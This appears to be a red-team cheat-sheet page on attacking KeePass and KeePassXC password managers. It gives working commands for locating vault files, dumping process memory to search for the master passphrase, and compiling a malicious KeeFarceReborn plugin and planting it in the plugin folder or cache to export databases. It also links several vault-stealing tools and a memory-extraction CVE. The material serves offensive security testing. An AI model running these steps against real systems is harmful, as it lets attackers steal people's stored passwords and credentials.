KeePass

Enumerate DB locations:

Cmd > type %APPDATA%\KeePass\KeePass.config.xml | findstr "<Path>"

KeePassXC

https://github.com/keepassxreboot/keepassxc

PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item "C:\Program Files\KeePassXC\KeePassXC.exe")).FileVersion

Extract Passphrase from Memory

https://github.com/d3lb3/KeePass-the-Hash

PS > .\strings2.exe -pid (Get-Process KeePassXC) -a -wide > keepassxc_strings.txt
PS > gc .\keepassxc_strings.txt | Select-String -Pattern Passw0
PS > (gc .\keepassxc_strings.txt).length
PS > (gc .\keepassxc_strings.txt).length / 1mb

DLL Hijacking

https://skr1x.github.io/keepass-dll-hijacking/

Extract Passphrase from Memory (< v2.53.1)

CVE-2023-32784

Abusing KeePass Triggers (< v2.54)

Tools

KeeFarce

https://github.com/denandz/KeeFarce

KeeFarceReborn

https://github.com/d3lb3/KeeFarceReborn

Abusing the KeePass Plugin Cache

Export DB by compiling and loading a malicious plugin (requires admin's privileges to place the .plgx file):

Cmd > KeePass.exe --plgx-create C:\KeeFarceReborn\KeeFarceRebornPlugin
Cmd > copy C:\KeeFarceReborn\KeeFarceRebornPlugin.plgx "C:\Program Files\KeePass Password Safe 2\Plugins"

Export DB by hijacking a legit plugin DLL (requires an existent plugin in use):

Cmd > copy "C:\Program Files\KeePass Password Safe 2\KeePass.exe" .
Cmd > devenv /build Release KeeFarceRebornPlugin.sln
Cmd > copy C:\KeeFarceReborn\KeeFarceRebornPlugin\bin\Release\KeeFarceRebornPlugin.dll C:\Users\snovvcrash\AppData\Local\KeePass\PluginCache\3o7A46QKgc2z6Yz1JH88\LegitPlugin.dll

KeePassHax

https://github.com/HoLLy-HaCKeR/KeePassHax

KeeThief

https://github.com/GhostPack/KeeThief

CrackMapExec

KeePwn

https://github.com/Orange-Cyberdefense/KeePwn

ThievingFox

Last updated 1 month ago